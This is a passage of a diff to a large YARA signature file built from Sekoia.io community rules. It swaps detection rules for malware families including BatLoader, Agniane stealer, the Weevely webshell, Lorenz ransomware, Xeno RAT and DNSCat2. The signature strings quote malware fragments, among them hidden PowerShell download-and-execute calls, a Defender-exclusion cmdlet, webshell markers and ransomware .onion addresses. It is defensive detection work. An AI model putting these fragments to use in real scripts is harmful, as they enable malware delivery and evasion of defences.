-		$ = "sysvol\\$Domain\\Poicies\\$GpoGuid" nocase wide ascii
-		$ = "Function Start-work" nocase wide ascii
-		$ = "Domain: {0}\" -f $Domain)" nocase wide ascii
+		$ = ".ToCharArray();[array]::Reverse(" ascii
+		$ = ");$res = -join ($bytes -as [char[]]);Invoke-Expression $res;" ascii
 
 	condition:
-		filesize < 3KB and 5 of them
+		all of them and filesize < 15KB
 }
-rule SEKOIA_Trojan_Android_Cerberus : FILE
+rule SEKOIA_Loader_Win_Batloader_Scripts : FILE
 {
 	meta:
-		description = "Detect samples of the Android banking trojan Cerberus, or its family"
+		description = "Finds BatLoader samples based on the specific download URL"
 		author = "Sekoia.io"
-		id = "3ea398bd-a80c-40f4-ad52-73b528add4ad"
-		date = "2022-01-24"
+		id = "31a04ad3-74f8-4aa5-b3fc-df792bdc71b5"
+		date = "2022-11-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/trojan_android_cerberus.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "18109733d15c994015646e786a7c6177a1209200fd4c80042db3d48c97c02030"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_batloader_scripts.yar#L1-L30"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "aab6c7780bbc7bed8994b4e70129107bb7b719642fae92b1d3f9146eb11efabc"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "assets/neurax.txt"
-		$str1 = "assets/Card_UpPotency_UI.json"
-		$str2 = "assets/Card_SignetFoster_UI.json"
-		$str3 = "assets/Gene_EmpathyTrainer.png"
-		$bin0 = "assets/180417.bin"
-		$bin1 = "assets/180513.bin"
-		$bin2 = "assets/180527.bin"
-		$bin3 = "assets/180528.bin"
+		$url = /https?:\/\/[^\s]{15,35}\/index\/[^\s]{1,40}servername=msi/ ascii wide
+		$str00 = "Invoke-WebRequest" ascii wide
+		$str01 = "PSScriptRoot" ascii wide
+		$str02 = "Add-MpPreference" ascii wide
+		$str03 = "Install-GnuPG" ascii wide
+		$str04 = "wmic computersystem get domain" ascii wide
+		$str05 = "ArpInfo" ascii wide
+		$str06 = "$script:List_ProccesCheck" ascii wide
+		$str07 = "Get-Process -Name" ascii wide
+		$str08 = "f001_SetProcessList" ascii wide
+		$str09 = "var WshShell" ascii wide
+		$str10 = "WScript.Sleep" ascii wide
+		$str11 = "WshShell.Run" ascii wide
+		$str12 = "powershell Invoke-WebRequest" ascii wide
+		$str13 = "-nop -w hidden " ascii wide
 
 	condition:
-		uint32be( 0 ) == 0x504B0304 and filesize > 1MB and filesize < 4MB and 3 of ( $str* ) and 3 of ( $bin* )
+		$url and 2 of ( $str* ) and filesize < 50KB
 }
-rule SEKOIA_Tool_Swor : FILE
+rule SEKOIA_Win_Malware_Agnianestealer : FILE
 {
 	meta:
-		description = "Detects swor"
+		description = "Detect the Agniane stealer using strings"
 		author = "Sekoia.io"
-		id = "75ce2ed7-2972-4e04-98dc-451acf80c842"
-		date = "2024-09-09"
+		id = "704c85b7-8b82-4160-ae1b-fd1054cae8e2"
+		date = "2023-08-10"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_swor.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "d3f92b3349109fc6de26f5e40800fec15308c27fa4fe81fe42af5030637a3a63"
-		logic_hash = "bcd1c0afece740b82b606aad8bdebcc88b72ae61df6513318215a217021efab4"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/win_malware_agnianestealer.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0aa40fcb713ab40711108290e8274d783c1336a2c4c03eba2fcc4a44f2ebe39f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231007,27 +231668,24 @@ rule SEKOIA_Tool_Swor : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$old_sword_s1 = "Failed to open payload file: "
-		$old_sword_s2 = "Failed to open config file: "
-		$sword_s1 = "open encrypted file error: "
-		$sword_s2 = "open config file error: "
-		$enum_calendar = "EnumCalendarInfo"
+		$s1 = "Agniane.pdb" ascii
+		$s2 = "Agniane.exe" wide ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and $enum_calendar and ( 2 of ( $old_sword_s* ) or 2 of ( $sword_s* ) ) and filesize < 1MB and true
+		( uint16be( 0 ) == 0x4d5a ) and filesize > 100KB and filesize < 3MB and 2 of them
 }
-rule SEKOIA_Malware_Remcom_Strings : FILE
+rule SEKOIA_Weevely_Webshell_Payload : FILE
 {
 	meta:
-		description = "Detects RemCom based on strings"
+		description = "Detects weevely webshell"
 		author = "Sekoia.io"
-		id = "7a56d55a-2f35-41ef-b7af-259baf215a62"
-		date = "2022-08-30"
+		id = "f2879c6e-3d1b-41be-8b1d-4f0503fd4b29"
+		date = "2024-04-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malware_remcom_strings.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a46bb87bf4722303d33707afb19c8d4f209b98a88552363363520536911469ae"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/weevely_webshell_payload.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "bb02ec519d77526cc81ebd7743336b333b9498f79079f7008970cf1bb51c4948"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231035,28 +231693,25 @@ rule SEKOIA_Malware_Remcom_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "RemComSvc"
-		$ = "RemCom_stderr"
-		$ = "RemCom_stdin"
-		$ = "\\\\.\\pipe\\%s%s%d"
-		$ = "RemCom_stdout"
-		$ = "\\\\.\\pipe\\RemCom_communicaton"
+		$s1 = "<?php include \""
+		$s2 = ".basename(__FILE__).\""
+		$s3 = ";__HALT_COMPILER(); ?>"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them
+		all of them and filesize < 1MB and @s1 == 0 and @s2 < @s3
 }
-rule SEKOIA_Apt_Apt29_Quarterrig
+rule SEKOIA_Apt_Lazarus_Blindingcan_Rtti
 {
 	meta:
-		description = "Detects QUARTERRIG"
+		description = "Detects BLINDINGCAN with RTTI"
 		author = "Sekoia.io"
-		id = "e370ed7e-5e12-4add-95f3-3773ea8e2d03"
-		date = "2023-04-19"
+		id = "9a16c189-ffc1-4aa6-8582-298abaecd0ef"
+		date = "2022-10-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt29_quarterrig.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9628418789a9bc24c7e44dbc9106ffa6316aefebe33b91c749b54cb5462b1309"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_lazarus_blindingcan_rtti.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fbec1f9a180782bf330d86facbada9af018741897c58f4ab6e0b52a1b38ae966"
 		score = 75
 		quality = 80
 		tags = ""
@@ -231064,50 +231719,53 @@ rule SEKOIA_Apt_Apt29_Quarterrig
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str_dll_name = "hijacker.dll"
-		$str_import_name = "VCRUNTIME140.dll"
-		$op_resolve_and_call_openthread = { 48 [6] 48 [6] 8B D8 E8 [4] [3] 33 D2 B9 FF FF 1F 00 FF D0 }
-		$op_resolve_and_call_suspendthread = { E8 [4] 48 8B CB FF D0 83 F8 FF }
+		$s1 = ".?AVCHTTP_Protocol@@" ascii wide fullword
+		$s2 = ".?AVCFileRW@@" ascii wide fullword
 
 	condition:
 		all of them
 }
-rule SEKOIA_Apt_Gamaredon_Lnks_Farl139_Hostname : FILE
+rule SEKOIA_Backdoor_Win_Foresttiger : FILE
 {
 	meta:
-		description = "Detects some hostname used in Gamaredon LNKs"
+		description = "Detect Lazarus' malware ForestTiger"
 		author = "Sekoia.io"
-		id = "f8bb2e6b-e544-46b0-b61b-048fe84e1100"
-		date = "2023-01-20"
+		id = "d3128da2-a86d-4db8-9b75-2f3048831c7e"
+		date = "2023-10-24"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_lnks_farl139_hostname.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8be31a4fed363f0e2791efb96a229f6cdec5bfaeaf3e9cd880f8d25c9ae0435e"
+		reference = "https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_foresttiger.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "401adaad1597c017c976c5b0b8f67851469c95758779b7691ebb037d0dda9f38"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "e06f29dccfe90ae80812c2357171b5c48fba189ae103d28e972067b107e58795"
+		hash2 = "0be1908566efb9d23a98797884f2827de040e4cedb642b60ed66e208715ed4aa"
 
 	strings:
-		$ = "desktop-farl139"
+		$ = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.42"
+		$ = "biwbih="
+		$ = "rlzbiw="
+		$ = "whoami EnDePriv Erro" wide
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and all of them and filesize < 10KB
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Tool_Paexec_Strings : FILE
+rule SEKOIA_Rat_Win_Xeno_Rat : FILE
 {
 	meta:
-		description = "Detects PAExec based on strings"
+		description = "Xeno RAT is an open-source RAT, used by Kimsuky in January 2024"
 		author = "Sekoia.io"
-		id = "c48b897c-0d88-4fa9-b64b-0e14a38a62d7"
-		date = "2022-09-23"
+		id = "4be1ff07-8180-42a8-9f51-b5e17bf23442"
+		date = "2024-02-09"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_paexec_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9c3bae822fd317bdc89c07542b05f6255d6af214071194570500eb2a12924ff6"
+		reference = "https://github.com/moom825/xeno-rat/tree/main/xeno%20rat%20client"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/rat_win_xeno_rat.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "252dd8b236ce3570b6df504d307d88ee7431c0eee361813f1d4f8a66ef1db703"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231115,54 +231773,55 @@ rule SEKOIA_Tool_Paexec_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\\\\%s\\%s\\PAExec_Move%u.dat" wide
-		$ = "PAExec_Move%u.dat" wide
-		$ = "Usage: PAExec [\\\\computer[,computer2[,...]]" wide
-		$ = "PAExec returning exit code %d" wide
+		$ = "Xeno-manager" wide
+		$ = "moom825"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 3 of them and filesize < 500KB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Apt_Muddywater_Manifestation_Backdoor : FILE
+rule SEKOIA_Ransomware_Win_Lorenz : FILE
 {
 	meta:
-		description = "Detects Muddys manifestation JScript backdoor"
+		description = "Detect the Lorenz ransomware"
 		author = "Sekoia.io"
-		id = "998fb0ab-73ed-41e5-b87e-f987b8f05a8c"
-		date = "2022-01-13"
+		id = "6936cc61-efe5-4d13-b76f-e808ab331457"
+		date = "2022-02-10"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_muddywater_manifestation_backdoor.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "477ed53ccd337dd21ab84b7d36b995a653d0aad6676e02cbe5e9f581bface253"
+		reference = "https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_lorenz.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "355de0f172c9e877bbca7f75c0bfb07d83ae7f43e7674a7f84c4e4d519dfa7c0"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.0"
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "/^\\s+|\\s+$/g" ascii
-		$l2 = "while (1) {" ascii
-		$l3 = { 57 53 63 72 69 70 74 2e 73 6c 65 65 70 28 ?? ?? 20 2a 20 31 30 30 30 29 3b }
-		$s4 = ")+ key , false)" ascii
-		$s5 = ")+ data , false)" ascii
+		$s1 = ".onion" ascii
+		$s2 = "---===Lorenz. Welcome. Again. ===--" ascii
+		$s3 = ".Lorenz.sz40" ascii
+		$url1 = "egypghtljedbs3x3ui45tfhosakzb376epl7baq2ruzfyewcypswhgqd.onion" ascii
+		$url2 = "lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion" ascii
+		$url3 = "vsoonropylvbfqnq2urk7uhaxn7afiwgldnj3ntc743awigojm4p7lid.onion" ascii
+		$url4 = "kpb3ss3vwvfejd4g3gvpvqo6ad7nnmvcqoik4mxt2376yu2adlg5fwyd.onion" ascii
+		$url5 = "vldkrmiqriwlgm2wuxg42nvc6kqsdzsdhsybn27hyn34d66465fxz7id.onion" ascii
 
 	condition:
-		filesize > 1000 and ( $l3 in ( @l2 .. @l2 + 300 ) ) and ( any of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize > 900KB and filesize < 1200KB and ( all of ( $s* ) or 1 of ( $url* ) )
 }
-rule SEKOIA_Infostealer_Win_Blackguard_Mar23 : FILE
+rule SEKOIA_Apt_Mustangpanda_Downloader : FILE
 {
 	meta:
-		description = "Finds BlackGuard samples based on specific strings (March 2023, version 5)"
+		description = "Detects the MustangPanda Downloader"
 		author = "Sekoia.io"
-		id = "65804d31-2a0c-4b22-a8d9-8cbe1497f155"
-		date = "2023-03-27"
+		id = "54850ffd-f93b-4082-b3ca-8e1d60b35422"
+		date = "2022-03-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_blackguard_mar23.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "63d77808036478da0c8d38a6d3581ccd2d4e46ae16ec9e817f09f8b633b01843"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_mustangpanda_downloader.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0bff0ee2960ecfa29939720e7efacaa35359f4fe555ae160c674efebf29bf61e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231170,32 +231829,26 @@ rule SEKOIA_Infostealer_Win_Blackguard_Mar23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "==================  5.0 ==============" wide
-		$str02 = "/concerts/disk.php" wide
-		$str03 = "/concerts/memory.php" wide
-		$str04 = "/loader_v2.txt" wide
-		$str05 = "io.solarwallet.app\\Local Storage\\leveldb" wide
-		$str06 = "costura.dotnetzip.dll.compressed" ascii wide
-		$str07 = "set_Laskakakaska" ascii
-		$str08 = "get_Yliana" ascii
-		$str09 = "set_Illeona" ascii
-		$str10 = "set_Gyttettfd" ascii
+		$ = "Windows Api" wide nocase
+		$ = "200 OK" wide
+		$ = "200 ok" wide
+		$ = "mscoree.dll" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 4 of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Apt_K_47_Walkershell : FILE
+rule SEKOIA_Hacktool_Dnscat2_Strings : FILE
 {
 	meta:
-		description = "Detects WalkerShell used by APT-K-47"
+		description = "Detects DNSCat2 based on strings"
 		author = "Sekoia.io"
-		id = "201f8415-32d4-4af1-ba80-734554ced728"
-		date = "2024-02-14"
+		id = "9655cdd7-c7fe-4033-bdd9-bdfcfd2bf827"
+		date = "2022-02-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt_k_47_walkershell.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0dffd8e4d6c244a4faea0f8b8cda1e544a732ad9982e7963b21d5f71080f8f5d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_dnscat2_strings.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "40d906ca3a00f7d3e2f8d043dbbc77a2a57fd133f4812b863aec6d5a0f57a8c9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231203,56 +231856,29 @@ rule SEKOIA_Apt_Apt_K_47_Walkershell : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "\\n kuskure" ascii wide
-		$s2 = "col.log.txt" ascii wide
-		$s3 = "polor" ascii wide
-		$s4 = "emit" ascii wide
-		$s5 = "delta" ascii wide
-		$s6 = "under process" ascii wide
-
-	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 4MB and all of them
-}
-rule SEKOIA_Exploit_Cve20191458_Strings : CVE_2019_1458 FILE
-{
-	meta:
-		description = "Detects compiled exploit for CVE-2019-1458 (Generic)"
-		author = "Sekoia.io"
-		id = "0be4a550-0f0a-4596-ab32-aafaececf919"
-		date = "2022-08-29"
-		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/exploit_cve20191458_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8e22a79b3d7dc45d63062c71909faee61584c71b6ea7353ba0f40c00745a2075"
-		score = 75
-		quality = 80
-		tags = "CVE-2019-1458, FILE"
-		version = "1.0"
-		classification = "TLP:CLEAR"
-
-	strings:
-		$ = "[-] Failed to create SploitWnd window"
-		$ = "[+] ProcessCreated with pid %d!"
-		$ = "[!] Exploit fail, test:0x%p,tagWND:0x%p, error:0x%lx"
-		$ = "[*] tagWND: 0x%p, tagCLS:0x%p, gap:0x%llx"
-		$ = "[*] Simulating alt key press"
+		$ = "Creating a exec('%s') session!"
+		$ = "RROR parsing --dns"
+		$ = "Got a ping request! Responding!"
+		$ = "[Tunnel %d] Received %zd bytes"
+		$ = "[Tunnel %d] connection to %s:%d"
+		$ = "You'll need to use --dns server=<server>"
+		$ = "Setting delay between packets to %dms"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 3 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 3 of them
 }
-rule SEKOIA_Apt_Gamaredon_Ddrdoh_Powershell_Backdoor : FILE
+rule SEKOIA_Shell_Win_Danfuan : FILE
 {
 	meta:
-		description = "Detects GAMAREDON's DDRDOH PowerShell Backdoor"
+		description = "Detect the Danfuan malware"
 		author = "Sekoia.io"
-		id = "3413dedd-e3ec-4231-8af7-c7f709ab82d7"
-		date = "2023-01-23"
+		id = "d1cf9988-270b-4a22-bdd5-f40b625715a8"
+		date = "2022-11-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_ddrdoh_powershell_backdoor.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "32d088affb65d410b2715fde28227792ea9f406e324de4a2e204e9850f0b81ce"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/shell_win_danfuan.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "96929ef478a8773022233a4092b3c157867aae6ee185568a6327d033c05a68f1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231260,27 +231886,25 @@ rule SEKOIA_Apt_Gamaredon_Ddrdoh_Powershell_Backdoor : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "hidden iex $env:" ascii wide
-		$ = ".substring(0,4) -eq \"http" ascii wide
-		$ = ".split('!')[1];" ascii wide
-		$ = " -bxor $key[$i % $key.Length]" ascii wide
-		$s = "Filter $fil | Select-Object VolumeSerialNumber" ascii wide
+		$ = "<%@ WebHandler Language=\"C#\" class=\"DynamicCodeCompiler\"%>"
+		$ = "CompilerResults compilerResults = compiler.CompileAssemblyFromSource(comPara, SourceText(txt))"
+		$ = "MethodInfo objMifo = objInstance.GetType().GetMethod("
 
 	condition:
-		uint8( 0 ) == 0x24 and 4 of them and filesize < 10KB
+		filesize < 15KB and all of them
 }
-rule SEKOIA_Guloader_Unpacker_Decoded : FILE
+rule SEKOIA_Backdoor_Lin_Sysupdate : FILE
 {
 	meta:
-		description = "GuLoader Unpacker b64 decoded"
+		description = "Detect the SysUpdate malware"
 		author = "Sekoia.io"
-		id = "ca3f4fce-b3a1-4672-a2ca-29ea347eb23d"
-		date = "2024-02-07"
+		id = "9cb806cf-4ca1-44d8-809a-58cc5f364fb8"
+		date = "2023-03-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/guloader_unpacker_decoded.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5de4a147b2dea8a144905b7f1786199bfeef3006ac58179409cfd3dcaa116725"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_lin_sysupdate.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "93e17cd535444e9cabc7440b1226526e67ddb81a84eb6377689a62f268b9dfee"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231288,26 +231912,28 @@ rule SEKOIA_Guloader_Unpacker_Decoded : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$jumps = {71 01 9b 71 01 9b}
-		$s1 = "([String]$"
-		$s2 = "For($"
-		$s3 = ",[Parameter(Position = 1)] [Type] $"
+		$ = "generate guid path=%s"
+		$ = "3rd/asio/include/asio/detail/posix_event.hpp"
+		$ = "expires_at"
+		$ = "%s -f %s"
+		$ = "expires_after"
+		$ = "-run"
 
 	condition:
-		filesize < 500KB and @jumps < 1000 and 2 of ( $s* )
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SEKOIA_Builder_Win_Royalroad_Rtf : FILE
+rule SEKOIA_Apt_Toddycat_Waexp_Strings : FILE
 {
 	meta:
-		description = "Detects RoyalRoad weaponized RTF documents"
+		description = "Detects WAExp based on strings"
 		author = "Sekoia.io"
-		id = "065e798b-eadd-4aac-a444-de61b75f0273"
-		date = "2022-06-23"
+		id = "1bbb3e81-14a9-4bda-b647-b6f5255e9a16"
+		date = "2024-04-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/builder_win_royalroad_rtf.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "831962105248e33422344d1431b90f2b567439b54252668f9294ea388f405b41"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_toddycat_waexp_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4377183b326329fb14ae3911fbb1e29cde220d7b247d048fba4bbbda9de8938d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231315,25 +231941,25 @@ rule SEKOIA_Builder_Win_Royalroad_Rtf : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "{\\object\\objocx{\\objdata"
-		$ = "ods0000"
+		$ = "[>] Profile:" wide ascii
+		$ = "[+] All Done" wide ascii
+		$ = "[+] Files:" wide ascii
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them and filesize < 1MB
 }
-rule SEKOIA_Apt_Evasive_Panda_Rphost_Dll : FILE
+rule SEKOIA_Tool_Tacticalrmm_Installer_Strings : FILE
 {
 	meta:
-		description = "Detects DLL used by Evasive Panda"
+		description = "Detects TacticalRMM installer"
 		author = "Sekoia.io"
-		id = "8d70639d-b736-4823-86ad-37f0e383b5f7"
-		date = "2024-03-15"
+		id = "c4a0ba33-b458-4c2a-abfa-4c33481d6491"
+		date = "2024-05-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_evasive_panda_rphost_dll.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "fa44028115912c95b5efb43218f3c7237d5c349f"
-		logic_hash = "2132f1c69db8fd5793c858ada2443fdfa1f941e68d24cc337766df99f8b3a895"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_tacticalrmm_installer_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0f8d66eb1c9c6ed9571a1dd7de05072aec6d3cda874618889d4fd51e5965bb26"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -231341,24 +231967,31 @@ rule SEKOIA_Apt_Evasive_Panda_Rphost_Dll : FILE
